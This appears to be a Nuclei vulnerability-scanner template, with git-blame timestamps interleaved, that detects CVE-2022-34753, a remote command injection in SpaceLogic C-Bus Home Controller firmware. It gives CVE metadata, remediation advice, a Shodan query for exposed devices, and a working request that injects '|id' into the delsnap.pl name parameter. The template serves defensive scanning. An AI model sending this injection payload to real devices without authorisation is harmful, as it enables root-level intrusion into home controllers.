2022-07-30 11:24:40 +00:00
id : CVE-2022-34753
info :
2023-03-27 17:46:47 +00:00
name : SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution
2022-07-30 11:24:40 +00:00
author : gy741
severity : high
description : |
2023-03-27 17:46:47 +00:00
SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade SpaceLogic C-Bus Home Controller to a version higher than 1.31.460 to mitigate this vulnerability.
2022-07-30 11:24:40 +00:00
reference :
- https://www.zeroscience.mk/codes/SpaceLogic.txt
2023-02-10 15:06:55 +00:00
- https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
- http://packetstormsecurity.com/files/167783/Schneider-Electric-SpaceLogic-C-Bus-Home-Controller-5200WHC2-Remote-Root.html
2023-03-27 17:46:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-34753
2022-07-30 11:24:40 +00:00
classification :
2023-02-10 15:06:55 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
2022-07-30 11:24:40 +00:00
cve-id : CVE-2022-34753
2023-02-10 15:06:55 +00:00
cwe-id : CWE-78
2023-10-31 18:27:55 +00:00
epss-score : 0.96071
2023-11-27 09:19:41 +00:00
epss-percentile : 0.99344
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:*
2023-02-10 10:36:27 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : schneider-electric
product : spacelogic_c-bus_home_controller_firmware
2023-09-06 11:59:08 +00:00
shodan-query : html:"SpaceLogic C-Bus"
2023-02-10 16:02:02 +00:00
tags : cve,cve2022,iot,spacelogic,rce,oast,packetstorm
2022-07-30 11:24:40 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-30 11:24:40 +00:00
- raw :
- |
GET /delsnap.pl?name=|id HTTP/1.1
Host : {{Hostname}}
2023-02-10 10:36:27 +00:00
Authorization : Basic {{base64('{{username}}:' + '{{password}}')}}
2022-07-30 11:24:40 +00:00
matchers-condition : and
matchers :
2023-02-10 10:36:27 +00:00
- type : regex
regex :
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
2022-07-30 11:24:40 +00:00
- type : status
status :
- 200
2023-11-27 10:10:24 +00:00
# digest: 4a0a00473045022100f5dc4740248b17cfc886f606b6373f69c0153de02828c0f5cf591a3cd1f47e0702201eca58775b56779768b5be7d887efc882c10bcdc38a3aff5ead5c422a9082b8f:922c64590222798bb761d5b6d8e72950